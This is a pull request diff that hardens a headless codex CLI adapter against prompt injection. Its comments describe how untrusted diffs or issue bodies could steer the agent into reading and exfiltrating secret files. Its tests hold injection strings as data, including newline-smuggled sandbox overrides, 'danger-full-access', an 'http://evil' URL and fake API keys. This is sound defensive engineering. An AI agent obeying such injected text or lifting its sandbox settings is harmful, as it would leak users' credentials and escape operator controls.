### PR TITLE
fix(codex-headless): harden agent tool surface, config-override allowlist, stderr redaction (#1008, sprint-bug-214)

### DIFF
--- a/.claude/adapters/loa_cheval/providers/codex_headless_adapter.py
+++ b/.claude/adapters/loa_cheval/providers/codex_headless_adapter.py
@@ -44,8 +44,10 @@ from __future__ import annotations
 import json
 import logging
 import os
+import re
 import shutil
 import subprocess
+import tempfile
 import time
 from pathlib import Path
 from typing import Any, Dict, List, Optional
@@ -57,6 +59,7 @@ from loa_cheval.providers.base import (
     enforce_context_window,
     run_subprocess_pgkill,
 )
+from loa_cheval.redaction import sanitize_provider_error_message
 from loa_cheval.types import (
     CompletionRequest,
     CompletionResult,
@@ -70,6 +73,52 @@ logger = logging.getLogger("loa_cheval.providers.codex_headless")
 
 # Allowed reasoning effort levels (codex CLI >= 0.125.0)
 _ALLOWED_REASONING_EFFORTS = ("low", "medium", "high", "xhigh")
+
+# Default-deny allowlist for `codex_config_overrides` (#1008 finding 2).
+# Only inference / reasoning-summary / output-verbosity *display* knobs may be
+# forwarded as `-c key=value`. Because ModelConfig.extra can come from project
+# config, an unrestricted pass-through would let an untrusted repository alter
+# codex's security posture (provider routing, sandbox, approval, network,
+# mcp/features/tools, auth) and bypass the fixed
+# `--ignore-user-config --sandbox read-only` stance. Any key NOT in this set —
+# including every dotted/nested key (e.g. `model_providers.x.base_url`) — is
+# dropped with a warning. reasoning_effort is handled separately and skipped.
+_ALLOWED_CONFIG_OVERRIDE_KEYS = frozenset(
+    {
+        "model_reasoning_summary",
+        "model_reasoning_summary_format",
+        "model_verbosity",
+        "reasoning_summaries",
+        "hide_agent_reasoning",
+    }
+)
+
+# sprint-bug-214 audit (cross-model DISS, KF-004 sidecar recovery): allowlisted
+# override VALUES are still interpolated into `-c key=value`. Restrict values to
+# a safe scalar charset so a value cannot carry TOML/newline/control
+# metacharacters that might smuggle a second config assignment past codex's
+# `-c` parser. Every legitimate value for the allowlisted keys is a simple token
+# (true/false, auto/concise/detailed/none, low/medium/high, experimental).
+_SAFE_OVERRIDE_VALUE_RE = re.compile(r"^[A-Za-z0-9_.\-]+$")
+
+# #1008 finding 1 (sprint-bug-214 audit, cross-model DISS): make the codex agent
+# NON-AGENTIC for the pure-inference use case by disabling its real-world tool
+# surface. Without the shell tool the agent cannot execute `cat`/`sed` to read +
+# exfiltrate absolute-path secrets (e.g. ~/.codex/auth.json) — closing the read
+# vector at its ROOT rather than relying on filesystem isolation. (codex
+# `--sandbox read-only` uses bubblewrap and gives a read-everything view on
+# standard hosts, so empty-cwd alone does not stop absolute-path reads.) Browser
+# / computer tools are disabled to remove network/action exfil paths. MCP/app
+# tools are already neutralized by `--ignore-user-config` (no servers load).
+# Empty-cwd (`-C`) + `--sandbox read-only` are retained as defense-in-depth.
+# Verified live: with these disabled, codex emits zero command_execution events
+# and reports it has no shell tool.
+_DISABLED_AGENT_FEATURES = (
+    "shell_tool",
+    "browser_use",
+    "browser_use_external",
+    "computer_use",
+)
 
 # codex CLI binary name (override via CODEX_HEADLESS_BIN env var for testing)
 _CODEX_BIN_DEFAULT = "codex"
@@ -118,7 +167,6 @@ class CodexHeadlessAdapter(ProviderAdapter):
         enforce_context_window(request, model_config)
 
         prompt = self._build_prompt(request.messages)
-        cmd = self._build_command(request, model_config)
         timeout_s = self._compute_timeout()
         # Cycle-110 sprint-2b2b1 BB iter-2 F-001 closure: read per-model
         # headless_concurrency_limit (cycle-110 ModelConfig field). Default 50
@@ -133,14 +181,34 @@ class CodexHeadlessAdapter(ProviderAdapter):
             n_slots,
         )
 
-        # Cycle-110 sprint-2b2b1 T2.11 — N-slot semaphore wire-up.
+        # Cycle-110 sprint-2b2b1 T2.11 — N-slot semaphore wire-up. Import BEFORE
+        # mkdtemp so an import failure can't leak the workspace (cursor #966
+        # round-2 lesson).
         from loa_cheval.adapters.headless_concurrency import (
             SemaphoreExhausted as _SemaphoreExhausted,
             acquire_slot as _acquire_slot,
         )
 
+        # #1008 finding 1: run codex in a fresh empty workspace so the
+        # read-only-sandboxed agent has no project files to read + exfiltrate
+        # via the normal completion path. `cwd=workspace` + `-C <workspace>`
+        # pin the agent's working root to the empty dir (mirrors
+        # cursor_headless). Created INSIDE the try and cleaned up in `finally`
+        # so a mkdtemp failure maps to a typed ProviderUnavailableError (not a
+        # raw OSError that would bypass the fallback chain) and never leaks a
+        # tempdir (sprint-bug-214 review DISS-002).
+        workspace: Optional[str] = None
         start = time.monotonic()
         try:
+            try:
+                workspace = tempfile.mkdtemp(prefix="loa-codex-ws-")
+            except OSError as exc:
+                raise ProviderUnavailableError(
+                    self.provider,
+                    f"codex-headless: failed to create isolated workspace: "
+                    f"{type(exc).__name__}",
+                ) from exc
+            cmd = self._build_command(request, model_config, workspace)
             with _acquire_slot("codex-headless", n_slots=n_slots):
                 try:
                     # #982: process-group-killing drop-in for subprocess.run —
@@ -153,6 +221,7 @@ class CodexHeadlessAdapter(ProviderAdapter):
                         # cycle-109 follow-up (#879 / #880 symmetric): strip
                         # OPENAI_API_KEY so codex exec uses OAuth, not API mode.
                         env=build_headless_subprocess_env(),
+                        cwd=workspace,
                     )
                 except subprocess.TimeoutExpired:
                     raise ProviderUnavailableError(
@@ -178,6 +247,9 @@ class CodexHeadlessAdapter(ProviderAdapter):
                 f"exhausted after {exc.waited_seconds:.1f}s "
                 f"(n_slots={exc.n_slots})",
             ) from exc
+        finally:
+            if workspace is not None:
+                shutil.rmtree(workspace, ignore_errors=True)
 
         latency_ms = int((time.monotonic() - start) * 1000)
 
@@ -243,8 +315,16 @@ class CodexHeadlessAdapter(ProviderAdapter):
         self,
         request: CompletionRequest,
         model_config,
+        workspace: Optional[str] = None,
     ) -> List[str]:
-        """Build the codex exec argv. Single-shot, sandboxed read-only."""
+        """Build the codex exec argv. Single-shot, sandboxed read-only.
+
+        When `workspace` is provided, `-C <workspace>` pins codex's working
+        root to that (empty) directory so the read-only-sandboxed agent has no
+        project files to read + exfiltrate (#1008 finding 1). `complete()`
+        always supplies a fresh tempdir; the parameter is optional only so the
+        argv-shaping unit tests can exercise the other flags in isolation.
+        """
         # cycle-104 sprint-2 T2.11 amendment: honor `extra.cli_model`
         # so a kind:cli alias (e.g. `codex-headless`) translates to the
         # real codex model identifier the CLI binary expects.
@@ -262,19 +342,48 @@ class CodexHeadlessAdapter(ProviderAdapter):
             cli_model,
         ]
 
+        # Disable the agent's real-world tool surface so it cannot read +
+        # exfiltrate files (#1008 finding 1). See _DISABLED_AGENT_FEATURES.
+        for feature in _DISABLED_AGENT_FEATURES:
+            cmd.extend(["--disable", feature])
+
+        if workspace:
+            cmd.extend(["-C", workspace])
+
         effort = self._resolve_reasoning_effort(request, model_config)
         if effort:
             cmd.extend(["-c", f"model_reasoning_effort={effort}"])
 
-        # Forward additional codex `-c key=value` overrides if the operator
-        # set them in ModelConfig.extra. This is the escape hatch for
-        # codex-specific knobs we don't have first-class fields for yet
-        # (e.g., model_provider="oss", reasoning_summaries=true).
+        # Forward additional codex `-c key=value` overrides ONLY for keys on the
+        # default-deny allowlist (#1008 finding 2). Project config
+        # (ModelConfig.extra) must not be able to alter codex's security posture
+        # (provider routing, sandbox, approval, network, mcp/features/tools,
+        # auth); any non-allowlisted key — including every dotted/nested key —
+        # is dropped with a warning, matching the reasoning_effort
+        # fall-through (no raise, request still proceeds).
         extra = (model_config.extra or {}).get("codex_config_overrides")
         if isinstance(extra, dict):
             for key, value in extra.items():
                 # Skip the reasoning_effort key — already handled above
                 if key == "reasoning_effort":
+                    continue
+                if key not in _ALLOWED_CONFIG_OVERRIDE_KEYS:
+                    logger.warning(
+                        "codex-headless: rejecting non-allowlisted "
+                        "codex_config_overrides key=%r (allowed: %s)",
+                        key,
+                        ", ".join(sorted(_ALLOWED_CONFIG_OVERRIDE_KEYS)),
+                    )
+                    continue
+                if not _SAFE_OVERRIDE_VALUE_RE.match(str(value)):
+                    # Defense in depth (sprint-bug-214 audit): reject values
+                    # carrying TOML/newline/control metacharacters that could
+                    # smuggle a second `-c` assignment past codex's parser.
+                    logger.warning(
+                        "codex-headless: rejecting codex_config_overrides "
+                        "key=%r with unsafe value (must be a simple scalar token)",
+                        key,
+                    )
                     continue
                 cmd.extend(["-c", f"{key}={value}"])
 
@@ -468,6 +577,13 @@ class CodexHeadlessAdapter(ProviderAdapter):
         if "rate limit" in stderr_lower or "429" in stderr or "too many requests" in stderr_lower:
             raise RateLimitError(self.provider)
 
+        # #1008 finding 3: codex stderr can carry prompt fragments, paths, or
+        # account/secret tokens. Route it through the shared provider-error
+        # redactor (cycle-103 T3.3) and sanitize BEFORE truncating, so a
+        # secret-shape token can't be cut mid-string and leak a prefix. The
+        # classification above still keys off the raw stderr.
+        safe_stderr = sanitize_provider_error_message(stderr.strip())
+
         # Auth failure — most actionable for operators new to subscription mode
         if (
             "not authenticated" in stderr_lower
@@ -478,12 +594,12 @@ class CodexHeadlessAdapter(ProviderAdapter):
             raise ConfigError(
                 f"codex CLI not authenticated. Run: codex login. "
                 f"(Auth file: {_CODEX_AUTH_FILE}; "
-                f"stderr: {stderr.strip()[:300]})"
+                f"stderr: {safe_stderr[:300]})"
             )
 
         # Anything else: surface as provider-unavailable so retry/fallback
         # logic in cheval can react.
-        snippet = stderr.strip()[:500] or f"exit code {returncode}, no stderr"
+        snippet = safe_stderr[:500] or f"exit code {returncode}, no stderr"
         raise ProviderUnavailableError(
             self.provider,
             f"codex exec failed (exit {returncode}): {snippet}",

--- a/.claude/adapters/tests/test_codex_headless_adapter.py
+++ b/.claude/adapters/tests/test_codex_headless_adapter.py
@@ -150,6 +150,16 @@ class TestCommandConstruction:
         for arg in cmd:
             assert "model_reasoning_effort" not in arg
 
+    def test_agent_tool_surface_disabled(self):
+        # #1008 finding 1 (audit): the agent's shell/browser/computer tools must
+        # be disabled so a prompt-injected diff cannot execute commands to
+        # read + exfiltrate files despite --sandbox read-only.
+        adapter = CodexHeadlessAdapter(_make_config())
+        cmd = adapter._build_command(_make_request(), ModelConfig())
+        disabled = {cmd[i + 1] for i, a in enumerate(cmd) if a == "--disable"}
+        for feature in ("shell_tool", "browser_use", "browser_use_external", "computer_use"):
+            assert feature in disabled, f"{feature} must be disabled"
+
     def test_reasoning_effort_from_metadata_overrides_model_config(self):
         adapter = CodexHeadlessAdapter(_make_config(extra={"reasoning_effort": "high"}))
         req = _make_request(metadata={"reasoning_effort": "low"})
@@ -168,18 +178,18 @@ class TestCommandConstruction:
         # "extreme" is not in allowed set; should be dropped silently with a WARN
         assert not any("model_reasoning_effort=" in arg for arg in cmd)
 
-    def test_extra_codex_config_overrides_passed_through(self):
+    def test_extra_codex_config_overrides_allowlisted_key_passes(self):
+        # #1008 finding 2: an inference-only key on the allowlist still passes
+        # through as `-c key=value`; reasoning_effort is not duplicated.
         extra = {
             "reasoning_effort": "low",
             "codex_config_overrides": {
                 "reasoning_summaries": "true",
-                "model_provider": "oss",
             },
         }
         adapter = CodexHeadlessAdapter(_make_config(extra=extra))
         cmd = adapter._build_command(_make_request(), adapter.config.models["gpt-5.5"])
         assert "reasoning_summaries=true" in cmd
-        assert "model_provider=oss" in cmd
         # reasoning_effort still present once (not duplicated by extra dict)
         effort_count = sum(1 for arg in cmd if "model_reasoning_effort=" in arg)
         assert effort_count == 1
@@ -506,6 +516,213 @@ class TestSubprocessEnvFilter:
             adapter.complete(_make_request())
         env = mock_run.call_args.kwargs.get("env", {})
         assert env.get("OPENAI_API_KEY") == "sk-proj-test"
+
+
+# ---------------------------------------------------------------------------
+# #1008 finding 1 — isolate the agent read-surface (workspace cwd + -C)
+#
+# `--sandbox read-only` prevents writes, not reads. Untrusted flattened prompt
+# content (review diffs / issue bodies) could instruct the codex agent to read
+# workspace files and return them via the normal CompletionResult path. Mirror
+# the audit-blessed cursor_headless defense: run codex in a fresh empty tempdir
+# (cwd=workspace + `-C <workspace>`), removed in a finally even on raise.
+# ---------------------------------------------------------------------------
+
+
+class TestWorkspaceIsolation:
+    def test_build_command_includes_cd_workspace(self):
+        adapter = CodexHeadlessAdapter(_make_config())
+        cmd = adapter._build_command(
+            _make_request(), ModelConfig(), workspace="/tmp/loa-codex-ws-XXXX"
+        )
+        idx = cmd.index("-C")
+        assert cmd[idx + 1] == "/tmp/loa-codex-ws-XXXX"
+        # The read-only sandbox is retained alongside the isolation.
+        assert "read-only" in cmd
+
+    def test_pgkill_called_with_isolated_workspace_cwd(self):
+        # The helper must receive cwd=<fresh loa-codex-ws-* tempdir> so a
+        # (read-only-but-still-capable) agent tool call has nothing to reach.
+        adapter = CodexHeadlessAdapter(_make_config())
+        with patch(
+            "loa_cheval.providers.codex_headless_adapter.run_subprocess_pgkill"
+        ) as mock_run:
+            mock_run.return_value = _ok_proc(SAMPLE_JSONL_OUTPUT)
+            adapter.complete(_make_request())
+        kwargs = mock_run.call_args.kwargs
+        assert "loa-codex-ws-" in (kwargs.get("cwd") or "")
+
+    def test_workspace_removed_after_completion(self):
+        adapter = CodexHeadlessAdapter(_make_config())
+        with patch(
+            "loa_cheval.providers.codex_headless_adapter.run_subprocess_pgkill"
+        ) as mock_run:
+            mock_run.return_value = _ok_proc(SAMPLE_JSONL_OUTPUT)
+            adapter.complete(_make_request())
+            ws = mock_run.call_args.kwargs.get("cwd")
+        assert ws and "loa-codex-ws-" in ws
+        assert not os.path.exists(ws), "workspace tempdir must be cleaned up"
+
+    def test_workspace_removed_even_on_failure(self):
+        adapter = CodexHeadlessAdapter(_make_config())
+        captured = {}
+        with patch(
+            "loa_cheval.providers.codex_headless_adapter.run_subprocess_pgkill"
+        ) as mock_run:
+            def _capture(*args, **kwargs):
+                captured["cwd"] = kwargs.get("cwd")
+                return _fail_proc(2, "some unexpected error")
+
+            mock_run.side_effect = _capture
+            with pytest.raises(ProviderUnavailableError):
+                adapter.complete(_make_request())
+        ws = captured.get("cwd")
+        assert ws and "loa-codex-ws-" in ws
+        assert not os.path.exists(ws), "workspace must be cleaned up on the failure path too"
+
+    def test_mkdtemp_failure_raises_typed_provider_error(self):
+        # DISS-002 (review): a tempdir-creation failure must surface as a typed
+        # ProviderUnavailableError so the fallback chain still reacts — not a
+        # raw OSError — and must not leave the rmtree path dereferencing None.
+        adapter = CodexHeadlessAdapter(_make_config())
+        with patch(
+            "loa_cheval.providers.codex_headless_adapter.tempfile.mkdtemp",
+            side_effect=OSError("No space left on device"),
+        ):
+            with pytest.raises(ProviderUnavailableError):
+                adapter.complete(_make_request())
+
+
+# ---------------------------------------------------------------------------
+# #1008 finding 2 — default-deny allowlist for codex_config_overrides
+#
+# Every key under ModelConfig.extra.codex_config_overrides used to be appended
+# as `-c key=value` with no allowlist, letting (potentially untrusted) project
+# config alter codex's security posture (provider routing, sandbox, approval,
+# network, mcp/features/tools, auth). Only inference/display knobs may pass.
+# ---------------------------------------------------------------------------
+
+
+class TestConfigOverrideAllowlist:
+    def _cmd_with_overrides(self, overrides):
+        extra = {"codex_config_overrides": overrides}
+        adapter = CodexHeadlessAdapter(_make_config(extra=extra))
+        return adapter._build_command(_make_request(), adapter.config.models["gpt-5.5"])
+
+    def test_security_posture_key_rejected(self, caplog):
+        import logging
+
+        with caplog.at_level(logging.WARNING):
+            cmd = self._cmd_with_overrides({"model_provider": "oss"})
+        # The provider-routing key never reaches the argv.
+        assert not any("model_provider" in arg for arg in cmd)
+        assert any("model_provider" in rec.getMessage() for rec in caplog.records)
+
+    def test_multiple_security_keys_all_rejected(self):
+        cmd = self._cmd_with_overrides(
+            {
+                "sandbox_mode": "danger-full-access",
+                "approval_policy": "never",
+                "model_provider": "oss",
+                "shell_environment_policy": "all",
+                "mcp_servers": "x",
+            }
+        )
+        for bad in (
+            "sandbox_mode",
+            "approval_policy",
+            "model_provider",
+            "shell_environment_policy",
+            "mcp_servers",
+        ):
+            assert not any(bad in arg for arg in cmd), f"{bad} must be rejected"
+
+    def test_dotted_nested_key_rejected(self):
+        cmd = self._cmd_with_overrides({"model_providers.oss.base_url": "http://evil"})
+        assert not any("base_url" in arg for arg in cmd)
+        assert not any("model_providers" in arg for arg in cmd)
+
+    def test_allowlisted_key_passes(self):
+        cmd = self._cmd_with_overrides({"reasoning_summaries": "true"})
+        assert "reasoning_summaries=true" in cmd
+
+    def test_rejection_does_not_raise(self):
+        # Parity with reasoning_effort fall-through: a bad key is dropped with a
+        # warning; the request still proceeds (cmd is built, not an exception).
+        cmd = self._cmd_with_overrides({"model_provider": "oss", "reasoning_summaries": "true"})
+        assert "reasoning_summaries=true" in cmd
+        assert not any("model_provider" in arg for arg in cmd)
+
+    def test_allowlisted_key_with_injection_value_rejected(self):
+        # sprint-bug-214 audit (cross-model DISS): an allowlisted key carrying a
+        # TOML/newline injection value must NOT reach argv — the smuggled second
+        # assignment (sandbox_mode) must never appear.
+        cmd = self._cmd_with_overrides(
+            {"reasoning_summaries": 'true\nsandbox_mode="danger-full-access"'}
+        )
+        assert not any("sandbox_mode" in arg for arg in cmd)
+        assert not any("danger-full-access" in arg for arg in cmd)
+        assert not any("reasoning_summaries=true\n" in arg for arg in cmd)
+
+    def test_allowlisted_key_safe_scalar_value_passes(self):
+        # Sanity: a normal scalar value still passes after value-charset hardening.
+        cmd = self._cmd_with_overrides({"model_verbosity": "high"})
+        assert "model_verbosity=high" in cmd
+
+
+# ---------------------------------------------------------------------------
+# #1008 finding 3 — sanitize codex stderr before embedding in exceptions
+#
+# Both the auth (ConfigError) and generic (ProviderUnavailableError) branches
+# embedded up to 300-500 chars of raw stderr, which can carry prompt fragments,
+# paths, or account/secret tokens into caller-visible error output.
+# ---------------------------------------------------------------------------
+
+
+class TestStderrSanitization:
+    def test_generic_failure_redacts_secret_in_stderr(self):
+        adapter = CodexHeadlessAdapter(_make_config())
+        secret = "sk-proj-abcdEFGH1234ijklMNOP5678qrstUVWX"
+        with patch(
+            "loa_cheval.providers.codex_headless_adapter.run_subprocess_pgkill"
+        ) as mock_run:
+            mock_run.return_value = _fail_proc(2, f"boom leaked {secret} in trace")
+            with pytest.raises(ProviderUnavailableError) as exc_info:
+                adapter.complete(_make_request())
+        msg = str(exc_info.value)
+        assert secret not in msg
+        assert "[REDACTED" in msg
+
+    def test_auth_failure_redacts_secret_in_stderr(self):
+        adapter = CodexHeadlessAdapter(_make_config())
+        secret = "sk-proj-abcdEFGH1234ijklMNOP5678qrstUVWX"
+        with patch(
+            "loa_cheval.providers.codex_headless_adapter.run_subprocess_pgkill"
+        ) as mock_run:
+            mock_run.return_value = _fail_proc(
+                1, f"Error: not authenticated; token {secret}; run codex login"
+            )
+            with pytest.raises(ConfigError) as exc_info:
+                adapter.complete(_make_request())
+        msg = str(exc_info.value)
+        assert secret not in msg
+        # Actionable guidance is preserved even after redaction.
+        assert "codex login" in msg
+
+    def test_sanitize_then_truncate_no_prefix_leak(self):
+        # A secret near the 300/500-char truncation boundary must not survive as
+        # a leaked prefix: sanitize happens BEFORE truncation.
+        adapter = CodexHeadlessAdapter(_make_config())
+        secret = "sk-proj-" + "Z" * 60
+        padding = "x" * 470
+        with patch(
+            "loa_cheval.providers.codex_headless_adapter.run_subprocess_pgkill"
+        ) as mock_run:
+            mock_run.return_value = _fail_proc(2, padding + secret)
+            with pytest.raises(ProviderUnavailableError) as exc_info:
+                adapter.complete(_make_request())
+        msg = str(exc_info.value)
+        assert "sk-proj-ZZZ" not in msg
 
 
 # ---------------------------------------------------------------------------

--- a/grimoires/loa/ledger.json
+++ b/grimoires/loa/ledger.json
@@ -21,26 +21,26 @@
         {
           "local_id": 2,
           "global_id": 53,
-          "label": "Bridgebuilder Findings \u2014 Excellence Hardening",
+          "label": "Bridgebuilder Findings — Excellence Hardening",
           "status": "completed"
         },
         {
           "local_id": 3,
           "global_id": 54,
-          "label": "CI Hardening \u2014 Bridge Iteration 2",
+          "label": "CI Hardening — Bridge Iteration 2",
           "status": "completed"
         },
         {
           "local_id": 4,
           "global_id": 55,
-          "label": "CI Integrity \u2014 Bridge Iteration 3",
+          "label": "CI Integrity — Bridge Iteration 3",
           "status": "completed"
         }
       ]
     },
     {
       "id": "cycle-037",
-      "label": "Bridgebuilder Deep Review \u2014 Architectural Fixes",
+      "label": "Bridgebuilder Deep Review — Architectural Fixes",
       "status": "archived",
       "created": "2026-02-24T08:40:00Z",
       "prd": "grimoires/loa/prd.md",
@@ -58,7 +58,7 @@
     },
     {
       "id": "cycle-038",
-      "label": "Organizational Memory Sovereignty \u2014 Three-Zone State Architecture",
+      "label": "Organizational Memory Sovereignty — Three-Zone State Architecture",
       "status": "archived",
       "created": "2026-02-24T21:00:00Z",
       "archived": "2026-02-25T12:00:00Z",
@@ -106,7 +106,7 @@
     },
     {
       "id": "cycle-039",
-      "label": "Two-Pass Bridge Review \u2014 Decouple Convergence from Enrichment",
+      "label": "Two-Pass Bridge Review — Decouple Convergence from Enrichment",
       "status": "archived",
       "created": "2026-02-25T12:30:00Z",
       "archived": "2026-02-26T00:00:00Z",
@@ -123,19 +123,19 @@
         {
           "local_id": 2,
           "global_id": 64,
-          "label": "Excellence Hardening \u2014 Bridge Iteration 2",
+          "label": "Excellence Hardening — Bridge Iteration 2",
           "status": "completed"
         },
         {
           "local_id": 3,
           "global_id": 65,
-          "label": "Final Polish \u2014 Bridge Iteration 3",
+          "label": "Final Polish — Bridge Iteration 3",
           "status": "completed"
         },
         {
           "local_id": 4,
           "global_id": 66,
-          "label": "Metacognition \u2014 Confidence-Weighted Enrichment",
+          "label": "Metacognition — Confidence-Weighted Enrichment",
           "status": "completed"
         },
         {
@@ -147,32 +147,32 @@
         {
           "local_id": 6,
           "global_id": 68,
-          "label": "Ecosystem Context Integration \u2014 Pass 0 Prototype",
+          "label": "Ecosystem Context Integration — Pass 0 Prototype",
           "status": "completed"
         },
         {
           "local_id": 7,
           "global_id": 69,
-          "label": "Enrichment Pipeline Ergonomics \u2014 Schema-First Architecture",
+          "label": "Enrichment Pipeline Ergonomics — Schema-First Architecture",
           "status": "completed"
         },
         {
           "local_id": 8,
           "global_id": 70,
-          "label": "Pass 1 Convergence Cache \u2014 Cost Intelligence",
+          "label": "Pass 1 Convergence Cache — Cost Intelligence",
           "status": "completed"
         },
         {
           "local_id": 9,
           "global_id": 71,
-          "label": "Dynamic Ecosystem Context \u2014 From Static Hints to Living Memory",
+          "label": "Dynamic Ecosystem Context — From Static Hints to Living Memory",
           "status": "completed"
         }
       ]
     },
     {
       "id": "cycle-040",
-      "label": "Multi-Model Adversarial Review Upgrade \u2014 GPT-5.3-Codex + Gemini Tertiary",
+      "label": "Multi-Model Adversarial Review Upgrade — GPT-5.3-Codex + Gemini Tertiary",
       "status": "archived",
       "created": "2026-02-26T00:00:00Z",
       "archived": "2026-02-26T14:00:00Z",
@@ -189,14 +189,14 @@
         {
           "local_id": 2,
           "global_id": 73,
-          "label": "Bug Fix \u2014 Scoring Engine 3-Model Tertiary Cross-Scoring",
+          "label": "Bug Fix — Scoring Engine 3-Model Tertiary Cross-Scoring",
           "status": "completed"
         }
       ]
     },
     {
       "id": "cycle-041",
-      "label": "Vision-Aware Planning \u2014 Creative Agency for AI Peers",
+      "label": "Vision-Aware Planning — Creative Agency for AI Peers",
       "status": "archived",
       "created": "2026-02-26T14:00:00Z",
       "archived": "2026-02-26T18:00:00Z",
@@ -207,7 +207,7 @@
         {
           "local_id": 1,
           "global_id": 74,
-          "label": "Foundation \u2014 Schema, Library, Query, Shadow Mode",
+          "label": "Foundation — Schema, Library, Query, Shadow Mode",
           "status": "completed"
         },
         {
@@ -226,7 +226,7 @@
     },
     {
       "id": "cycle-042",
-      "label": "Vision Activation \u2014 From Infrastructure to Living Memory",
+      "label": "Vision Activation — From Infrastructure to Living Memory",
       "status": "archived",
       "created": "2026-02-26T18:00:00Z",
       "prd": "grimoires/loa/prd.md",
@@ -253,7 +253,7 @@
         {
           "local_id": 4,
           "global_id": 80,
-          "label": "Excellence Hardening \u2014 Bridgebuilder Findings",
+          "label": "Excellence Hardening — Bridgebuilder Findings",
           "status": "completed"
         }
       ],
@@ -292,7 +292,7 @@
     },
     {
       "id": "cycle-044",
-      "label": "Bridgebuilder Design Review \u2014 Pre-Implementation Architectural Intelligence",
+      "label": "Bridgebuilder Design Review — Pre-Implementation Architectural Intelligence",
       "status": "archived",
       "created": "2026-02-28T00:00:00Z",
       "archived": "2026-02-28T07:00:00Z",
@@ -322,7 +322,7 @@
     },
     {
       "id": "cycle-045",
-      "label": "Review Pipeline Hardening \u2014 Gemini Activation, Orchestrator Wiring, Red Team Post-Implementation",
+      "label": "Review Pipeline Hardening — Gemini Activation, Orchestrator Wiring, Red Team Post-Implementation",
       "status": "archived",
       "created": "2026-02-28T03:00:00Z",
       "prd": "grimoires/loa/prd.md",
@@ -352,7 +352,7 @@
     },
     {
       "id": "cycle-046",
-      "label": "Bridgebuilder Constellation \u2014 From Pipeline to Deliberation",
+      "label": "Bridgebuilder Constellation — From Pipeline to Deliberation",
       "status": "archived",
       "created": "2026-02-28T04:30:00Z",
       "archived": "2026-02-28T06:30:00Z",
@@ -369,7 +369,7 @@
         {
           "local_id": 2,
           "global_id": 91,
-          "label": "Deliberative Council \u2014 Prior Findings Integration",
+          "label": "Deliberative Council — Prior Findings Integration",
           "status": "completed"
         },
         {
@@ -388,7 +388,7 @@
     },
     {
       "id": "cycle-047",
-      "label": "Compassionate Excellence \u2014 Bridgebuilder Deep Review Integration",
+      "label": "Compassionate Excellence — Bridgebuilder Deep Review Integration",
       "status": "archived",
       "created": "2026-02-28T06:30:00Z",
       "prd": "grimoires/loa/prd.md",
@@ -424,7 +424,7 @@
     },
     {
       "id": "cycle-048",
-      "label": "Community Feedback \u2014 Review Pipeline Hardening",
+      "label": "Community Feedback — Review Pipeline Hardening",
       "status": "active",
       "created": "2026-02-28T08:50:00Z",
       "prd": "grimoires/loa/prd.md",
@@ -433,7 +433,7 @@
         {
           "local_id": 1,
           "global_id": 98,
-          "label": "Foundation \u2014 Curl Guard, Error Surfacing, YAML Regex",
+          "label": "Foundation — Curl Guard, Error Surfacing, YAML Regex",
           "status": "planned"
         },
         {
@@ -458,7 +458,7 @@
     },
     {
       "id": "cycle-bug-20260418-i553-cb632b",
-      "label": "Bug Fix \u2014 agent: Plan blocks Write in /architect and /sprint-plan",
+      "label": "Bug Fix — agent: Plan blocks Write in /architect and /sprint-plan",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/553",
@@ -479,7 +479,7 @@
     },
     {
       "id": "cycle-bug-20260418-i549-1aaa93",
-      "label": "Bug Fix \u2014 Shell Tests 20+ pre-existing failures on main (5 clusters)",
+      "label": "Bug Fix — Shell Tests 20+ pre-existing failures on main (5 clusters)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/549",
@@ -498,7 +498,7 @@
     },
     {
       "id": "cycle-bug-20260418-i555-5560f6",
-      "label": "Bug Fix \u2014 Silent data loss via git stash -k / git stash pop",
+      "label": "Bug Fix — Silent data loss via git stash -k / git stash pop",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/555",
@@ -518,7 +518,7 @@
     },
     {
       "id": "cycle-bug-20260418-i545-e2c781",
-      "label": "Bug Fix \u2014 Spiral REVIEW gate fix-loop + quality_gate recovery (#545 + #546)",
+      "label": "Bug Fix — Spiral REVIEW gate fix-loop + quality_gate recovery (#545 + #546)",
       "type": "bugfix",
       "status": "active",
       "source_issues": [
@@ -542,7 +542,7 @@
     },
     {
       "id": "cycle-bug-20260418-i548-a2460c",
-      "label": "Bug Fix \u2014 vision-011 + cycle-082 deferred gates bundle (#548)",
+      "label": "Bug Fix — vision-011 + cycle-082 deferred gates bundle (#548)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/548",
@@ -558,7 +558,7 @@
     },
     {
       "id": "cycle-bug-20260418-i563-39dbdf",
-      "label": "Bug Fix \u2014 tripwire-handler rollback precheck misses untracked-only changes",
+      "label": "Bug Fix — tripwire-handler rollback precheck misses untracked-only changes",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/563",
@@ -571,7 +571,7 @@
     },
     {
       "id": "cycle-bug-20260418-i568-740715",
-      "label": "Bug Fix \u2014 spiral.task not exported to dispatch subprocess",
+      "label": "Bug Fix — spiral.task not exported to dispatch subprocess",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/568",
@@ -584,7 +584,7 @@
     },
     {
       "id": "cycle-bug-20260418-i570-83c0b5",
-      "label": "Bug Fix \u2014 spiral-harness hardcoded 300s planning timeouts",
+      "label": "Bug Fix — spiral-harness hardcoded 300s planning timeouts",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/570",
@@ -597,7 +597,7 @@
     },
     {
       "id": "cycle-bug-20260418-i573-cb3351",
-      "label": "Bug Fix \u2014 Flatline model allowlist hygiene & graceful degradation (#573+#574)",
+      "label": "Bug Fix — Flatline model allowlist hygiene & graceful degradation (#573+#574)",
       "type": "bugfix",
       "status": "active",
       "source_issue": "https://github.com/0xHoneyJar/loa/issues/573",
@@ -637,13 +637,13 @@
         {
           "local_id": "3A",
           "global_id": 116,
-          "label": "Health-Probe Core \u2014 KEYSTONE part 1 (T2.2)",
+          "label": "Health-Probe Core — KEYSTONE part 1 (T2.2)",
           "status": "merged"
         },
         {
           "local_id": "3B",
           "global_id": 117,
-          "label": "Health-Probe Resilience+CI+Integration+Runbook \u2014 KEYSTONE part 2 (T2.2)",
+          "label": "Health-Probe Resilience+CI+Integration+Runbook — KEYSTONE part 2 (T2.2)",
           "status": "merged"
         },
         {
